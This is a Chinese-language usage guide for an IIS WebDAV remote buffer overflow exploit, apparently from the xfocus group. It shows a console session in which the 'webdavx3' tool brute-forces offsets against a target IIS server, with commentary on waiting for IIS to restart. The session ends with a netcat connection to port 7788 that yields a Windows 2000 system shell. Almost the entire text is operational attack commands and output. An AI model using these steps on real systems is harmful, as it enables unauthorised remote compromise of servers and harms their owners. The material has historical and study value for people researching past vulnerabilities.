IIS WebDAV远程溢出程序使用方法:
///////////////////////////////////////////////////////////
by isno@xfocus.org
http://www.xfocus.net
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS在这里重起了,等一会)
try offset: -4 (程序运行到这里停顿下来了,如果停顿时间比较长都没有反应,就按Ctrl+C,然后连上目标的7788端口去)
^C
C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>